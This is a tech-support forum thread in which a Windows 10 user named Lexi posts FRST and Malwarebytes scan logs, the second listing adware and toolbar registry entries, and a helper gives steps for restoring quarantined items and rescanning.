2016-02-10 09:09 - 2016-01-31 00:13 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00678400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-10 09:09 - 2016-01-31 00:11 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-10 09:09 - 2016-01-31 00:06 - 02316800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 01380864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:05 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:04 - 00100352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 03580416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-02-10 09:09 - 2016-01-31 00:02 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-02-10 09:09 - 2016-01-30 23:58 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 14:43 - 2015-08-27 20:40 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-03-09 14:43 - 2010-08-20 12:11 - 00000000 ___RD C:\Users\Lexi\My Pictures
2016-03-09 14:41 - 2015-07-10 07:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-03-09 14:41 - 2015-07-10 07:20 - 00346024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-03-09 14:40 - 2014-12-06 19:51 - 00000000 ____D C:\WINDOWS\5E1775C3DDD942C3831C153492BCD983.TMP
2016-03-09 14:39 - 2015-07-10 04:05 - 07864320 ___SH C:\WINDOWS\system32\config\BBI
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Portable Devices
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Multimedia Platform
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files (x86)\Windows Portable Devices
2016-03-09 14:38 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files (x86)\Windows Multimedia Platform
2016-03-09 14:38 - 2015-07-10 06:02 - 00000000 ____D C:\WINDOWS\INF
2016-03-09 14:18 - 2016-01-28 23:32 - 00004150 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{5ED844AE-3C2D-4062-87D9-F7E3150673DE}
2016-03-09 14:09 - 2012-04-07 21:50 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-03-09 11:17 - 2015-07-10 05:55 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-03-09 10:18 - 2013-09-26 08:59 - 00000000 ____D C:\Users\Lexi\AppData\Local\Skitch
2016-03-09 10:02 - 2015-08-27 20:13 - 00000000 ____D C:\Users\Lexi
2016-03-09 10:02 - 2011-05-20 12:30 - 00000000 ____D C:\Users\Lexi\AppData\LocalLow\Temp
2016-03-09 00:31 - 2013-08-07 12:46 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-03-09 00:18 - 2013-05-27 17:31 - 143659408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ___HD C:\Program Files\WindowsApps
2016-03-08 22:39 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-03-08 22:06 - 2016-01-28 15:11 - 00000000 ____D C:\Program Files (x86)\Avidemux 2.6 - 32 bits
2016-03-08 22:06 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\AppLocker
2016-03-08 22:06 - 2013-06-18 14:19 - 00000000 ____D C:\Program Files (x86)\File Type Helper
2016-03-08 22:06 - 2013-02-20 00:03 - 00000000 ____D C:\WINDOWS\SysWOW64\C2MP
2016-03-08 22:06 - 2010-08-13 21:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.com
2016-03-08 22:05 - 2015-11-14 19:53 - 00000000 ____D C:\Users\DefaultAppPool
2016-03-08 22:05 - 2015-07-10 08:14 - 00000000 ____D C:\WINDOWS\ShellNew
2016-03-08 22:05 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\system32\WinMetadata
2016-03-08 22:05 - 2013-09-26 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skitch
2016-03-08 22:05 - 2013-07-20 16:02 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClockworkMod
2016-03-08 22:05 - 2011-08-24 08:48 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Duplicate Cleaner
2016-03-08 22:05 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-03-08 22:04 - 2016-02-01 17:19 - 00000000 ____D C:\WINDOWS\Minidump
2016-03-08 22:04 - 2016-01-28 16:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:04 - 2016-01-28 15:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avidemux (32bits)
2016-03-08 22:04 - 2015-07-10 08:14 - 00000000 ____D C:\Program Files\Windows Journal
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\rescache
2016-03-08 22:04 - 2015-07-10 06:04 - 00000000 ____D C:\Program Files\Windows Defender
2016-03-08 22:04 - 2015-07-10 04:05 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-03-08 22:04 - 2013-09-10 08:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
2016-03-08 22:04 - 2013-01-17 18:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BodyMedia
2016-03-08 22:04 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Scholastic
2016-03-08 22:04 - 2012-09-15 23:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garmin
2016-03-08 22:04 - 2012-06-22 18:42 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\PCCUStubInstaller
2016-03-08 22:04 - 2011-08-24 08:18 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-03-08 22:04 - 2010-09-24 19:55 - 00000000 ____D C:\Users\Lexi\Documents\Audible
2016-03-08 22:04 - 2010-09-19 09:15 - 00000000 ____D C:\Users\Lexi\AppData\Local\Microsoft Help
2016-03-08 22:03 - 2016-01-28 16:40 - 00000000 ____D C:\Program Files (x86)\Free AVI MPEG WMV MP4 FLV Video Joiner
2016-03-08 22:03 - 2013-09-10 08:38 - 00000000 ____D C:\Program Files (x86)\Coupons
2016-03-08 22:03 - 2013-07-20 16:01 - 00000000 ____D C:\Program Files (x86)\ClockworkMod
2016-03-08 22:03 - 2013-05-28 16:57 - 00000000 ____D C:\Program Files (x86)\Evernote
2016-03-08 22:03 - 2013-05-27 22:25 - 00000000 ____D C:\Program Files (x86)\Belarc
2016-03-08 22:03 - 2013-01-17 18:40 - 00000000 ____D C:\Program Files (x86)\BodyMedia
2016-03-08 22:03 - 2012-12-03 01:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-03-08 22:03 - 2012-09-15 23:53 - 00000000 ____D C:\Program Files (x86)\Garmin
2016-03-08 22:03 - 2012-06-18 22:23 - 00000000 ____D C:\Program Files (x86)\LG Electronics
2016-03-08 22:03 - 2011-08-24 08:49 - 00000000 ____D C:\Program Files (x86)\Bing Bar Installer
2016-03-08 22:03 - 2011-08-24 08:48 - 00000000 ____D C:\Program Files (x86)\Duplicate Cleaner
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iTunes
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files\iPod
2016-03-08 22:03 - 2011-08-24 08:22 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-03-08 22:03 - 2011-08-24 08:18 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files\Bonjour
2016-03-08 22:03 - 2011-08-24 08:17 - 00000000 ____D C:\Program Files (x86)\Bonjour
2016-03-08 22:03 - 2011-01-14 18:51 - 00000000 ____D C:\Program Files (x86)\Cozi Express
2016-03-08 22:03 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files (x86)\Google
2016-03-08 22:03 - 2010-05-28 20:35 - 00000000 ____D C:\Program Files (x86)\TOSHIBA
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2016-03-08 22:03 - 2010-05-28 20:34 - 00000000 ____D C:\Program Files\TOSHIBA
2016-03-08 21:48 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\registration
2016-03-08 21:47 - 2015-07-10 06:04 - 00000000 ____D C:\WINDOWS\SystemResources
2016-03-08 21:42 - 2014-04-26 20:45 - 00000000 ____D C:\Users\Lexi\Documents\Bio101
2016-03-08 21:41 - 2015-08-27 20:40 - 00000000 ____D C:\Users\Lexi\AppData\Local\Packages
2016-03-08 21:38 - 2011-08-24 08:22 - 00000000 ____D C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001}
2016-03-08 21:38 - 2010-08-20 12:24 - 00000000 ____D C:\Users\Lexi\AppData\Local\Google
2016-03-08 21:37 - 2011-08-24 08:17 - 00000000 ____D C:\ProgramData\Apple
2016-03-08 21:36 - 2010-05-28 20:42 - 00000000 ____D C:\Program Files\Google
2016-03-08 21:34 - 2010-08-13 21:25 - 00000000 __RHD C:\MSOCache
2016-03-07 22:57 - 2011-01-14 18:51 - 00000000 ____D C:\ProgramData\Cozi
2016-03-07 22:56 - 2010-08-13 21:56 - 00000000 ____D C:\Program Files (x86)\TOSHIBA Corporation
2016-03-04 11:31 - 2010-08-13 21:57 - 00000000 ___HD C:\WINDOWS\msdownld.tmp
2016-03-04 07:39 - 2015-08-28 00:05 - 00000000 ___DC C:\WINDOWS\Panther
2016-03-04 07:19 - 2015-10-30 04:42 - 00000000 ___HD C:\$WINDOWS.~BT
2016-03-03 23:16 - 2012-11-10 18:24 - 00000000 ____D C:\Users\Lexi\Documents\Storia
2016-02-26 12:07 - 2010-09-04 17:25 - 00000000 ____D C:\Users\Lexi\AppData\Roaming\AnVi
2016-02-25 22:42 - 2015-08-27 20:11 - 01005598 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-02-25 20:45 - 2010-08-30 21:35 - 00012288 _____ C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2016-02-20 19:59 - 2013-01-13 11:18 - 630943674 _____ C:\WINDOWS\MEMORY.DMP
2016-02-20 14:50 - 2016-01-28 11:18 - 00000000 ____D C:\Users\Lexi\AppData\Local\Screencast-O-Matic-v2
2016-02-19 17:17 - 2013-03-05 16:40 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-19 17:17 - 2013-03-05 16:40 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-02-16 22:41 - 2016-01-12 21:09 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-16 22:41 - 2012-05-30 11:51 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service

==================== Files in the root of some directories =======

2016-01-28 17:15 - 2016-01-28 17:15 - 0000047 _____ () C:\Users\Lexi\AppData\Roaming\WB.CFG
2011-03-24 12:02 - 2015-12-07 21:16 - 0000618 _____ () C:\Users\Lexi\AppData\Roaming\wklnhst.dat
2010-08-30 21:35 - 2016-02-25 20:45 - 0012288 _____ () C:\Users\Lexi\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2011-07-02 19:22 - 2011-07-02 19:22 - 0000188 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

Some files in TEMP:
====================
C:\Users\Lexi\AppData\Local\Temp\sqlite-3.7.2-sqlitejdbc.dll


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-03-08 23:13

==================== End of FRST.txt ============================


Also, this log problem occurred on 3/7/2016 as well. I downloaded Malwarebytes, ran it, couldn't use my Windows features, restored to a point before I downloaded it, reran Malwarebytes, did all the suggested options AND deleted the quarantined items. The log for that time and date (which is actually supposed to say 6:11) indicates no such actions, which is when I signed up for the forums:

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/7/2016
Scan Time: 10:00 PM
Logfile:
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.03.08.01
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 432217
Time Elapsed: 35 min, 32 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


 

"The log does not appear to be accurate as it found around 117 things and moved them to the quarantine"

That is a quote from your reply #9. If all of those entries are in quarantine, it is a simple action to restore them all.....

Open Malwarebytes, select > History > Quarantine..

In quarantine select all items, then select restore. All removed entries will be restored....

With that action complete, re-boot your PC.

Open Malwarebytes again, run a threat scan, but this time take no action, do not remove any entries. Post that log....


I just did as you suggested, stopping at the point you mentioned. No log is present in the "history tab", but there was the link on the scan tab to export results. I am wondering if the issues with Windows are actually not permanent and are related directly to having Malwarebytes running (I have not tested to see if they are still there when the program is disabled).

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 6:10 PM
Logfile:
Administrator: Yes

Version: 2.2.0.1024
Malware Database: v2016.03.09.06
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 420528
Time Elapsed: 39 min, 47 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 1
PUP.Optional.FastFreeConverter, C:\Program Files (x86)\Fast Free Converter\FastFreeConverterUpdt.exe, 1376, , [eeccd9acfd9c54e20f7621e0ae5649b7]

Modules: 0
(No malicious items detected)

Registry Keys: 62
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{8232785C-5C98-4A6E-B7B4-911FFBED7582}, , [5e5cbacbafea11259c32bc0bd2300cf4],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}, , [61591075aced0531a8f9c8eeb05203fd],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}, , [61591075aced0531a8f9c8eeb05203fd],
PUP.Optional.FunWebProducts, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\{1D4DB7D2-6EC9-47A3-BD87-1E41684E07BB}, , [61591075aced0531a8f9c8eeb05203fd],
PUP.Optional.MixiToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{62CAD681-699F-4F83-B87F-95584003592F}, , [dbdf7f06cfca0c2a29a69037d32f728e],
PUP.Optional.MixiToolbar, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{62CAD681-699F-4F83-B87F-95584003592F}, , [dbdf7f06cfca0c2a29a69037d32f728e],
PUP.Optional.MixiToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{62CAD681-699F-4F83-B87F-95584003592F}, , [dbdf7f06cfca0c2a29a69037d32f728e],
PUP.Optional.SearchToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{9D425283-D487-4337-BAB6-AB8354A81457}, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\SearchToolbarLib.CSearchToolbarImpl, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\SearchToolbarLib.CSearchToolbarImpl.1, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\SearchToolbarLib.CSearchToolbarImpl, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\SearchToolbarLib.CSearchToolbarImpl.1, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\SearchToolbarLib.CSearchToolbarImpl, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\SearchToolbarLib.CSearchToolbarImpl.1, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.SearchToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{9D425283-D487-4337-BAB6-AB8354A81457}, , [9b1f31546a2f74c2b46220928d753cc4],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}, , [caf0f4917227b38321225b5b38ca01ff],
PUP.Optional.FastFreeConverter, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}, , [caf0f4917227b38321225b5b38ca01ff],
PUP.Optional.FastFreeConverter, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\FastFreeConverterUpdt, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\Fast Free Converter, , [eeccd9acfd9c54e20f7621e0ae5649b7],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\CLASSES\Toolbar.CT2260173, , [d9e16b1abfdad26404bceafc669d9d63],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\CLASSES\Toolbar.CT3298582, , [fdbd54314059a98d8e32d70f45bed030],
PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR  , , [6a50bfc67920df57b3a582a619ebc63a],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, , [0eacfa8b356471c56abdb9b28b79827e],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, , [a2189bea0a8f78bed652e5861ee66e92],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\Conduit, , [0ab0b4d18e0b71c5a21597e9fe069967],
PUP.Optional.MyFreeze, HKLM\SOFTWARE\WOW6432NODE\Freeze.com, , [03b78ef71c7d02342e4218fb9b6916ea],
PUP.Optional.MixiDJ, HKLM\SOFTWARE\WOW6432NODE\MixiDJ_V46, , [caf0f392e1b865d1c47e5eb4d13351af],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar.CT2260173, , [7149d9acb4e59c9a4f71d511dd264db3],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\CLASSES\Toolbar.CT3298582, , [a317fc890297ad89efd1757148bb7e82],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\FAST FREE CONVERTER, , [d2e81b6a9bfea4923c4af60b4eb67f81],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\CCIFDKGNONHKCMAOAPPJPMIJDHLPPGMG, , [2199f5906435d6601ba225f6679c50b0],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{59C7FC09-1C83-4648-B3E6-003D2BBC7481}, , [b2084b3a9801d75feabdcb4657ad47b9],
PUP.Optional.ConduitTB.Gen, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{840E3B68-A458-41B7-8D2C-5E02A27F442E}, , [cfebcabb5643bb7b58ecfcfcc93a817f],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{9170B96C-28D4-4626-8358-27E6CAEEF907}, , [4e6ce79ee6b385b14166ec2525df6799],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{D1A71FA0-FF48-48DD-9B6D-7A13A3E42127}, , [c7f3770ef0a9bf77a30428e948bc1be5],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{DDB1968E-EAD6-40FD-8DAE-FF14757F60C7}, , [ba0035506d2ca98db8efdd3447bd8f71],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{F138D901-86F0-4383-99B6-9CDD406036DA}, , [f3c7a8dd752444f2584f1ff2b252b947],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio-3_RASAPI32, , [ecce6f16e1b87eb8f5dc650dcc383ac6],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio-3_RASMANCS, , [53673352c2d7bf7730a11161fd07916f],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio_RASAPI32, , [05b5acd9643575c1bd151f53f70d669a],
PUP.Optional.NetRadio, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\NetRadio_RASMANCS, , [863440451e7bd363a1313c3660a4b14f],
PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\WOW6432NODE\SPPDCOM, , [7f3b86ff2c6dcb6bf13e3b30b450837d],
PUP.Optional.FastFreeConverter, HKLM\SOFTWARE\WOW6432NODE\ZUPDATER\FastFreeConverterUpdt.exe, , [7b3fbacb772265d1731656ab9173d729],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Conduit, , [e9d114715c3dcd698e283b4562a24fb1],
PUP.Optional.SearchProtect.AppFlsh, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\SearchProtect, , [2892a8ddc9d055e1f6291754ae567c84],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\Conduit, , [d0eafb8a4b4ebd79a11491ef4cb8ed13],
PUP.Optional.Conduit, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\ConduitSearchScopes, , [3684364f7d1c46f04fd59662976c8b75],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\Fun Web Products, , [01b9bcc9b4e57bbbcc21887b05ff09f7],
PUP.Optional.FunWebProducts, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\FunWebProducts, , [6258dda8eaafc27437b75fa47e864eb2],
PUP.Optional.MixiDJToolbar, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\APPDATALOW\SOFTWARE\MixiDJ_V46, , [6e4c6025d5c4ee4845ffa56d49bbc838],
PUP.Optional.ConduitTB.Gen, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\GOOGLE\CHROME\EXTENSIONS\CCIFDKGNONHKCMAOAPPJPMIJDHLPPGMG, , [8b2f473ee0b965d1932b74a78b78936d],
PUP.Optional.ProductSetup, HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\PRODUCTSETUP, , [edcd8ff657423bfbc8ffa9703ec6b44c],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\WOW6432NODE\CLASSES\CLSID\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\Toolbar.CT3298582, , [8a30077eabee270f0eb1d4227a88659b],
PUP.Optional.MixiDJToolbar, HKLM\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{31E3431B-8F34-49CD-AE3D-992295E853A7}, , [8a30077eabee270f0eb1d4227a88659b],
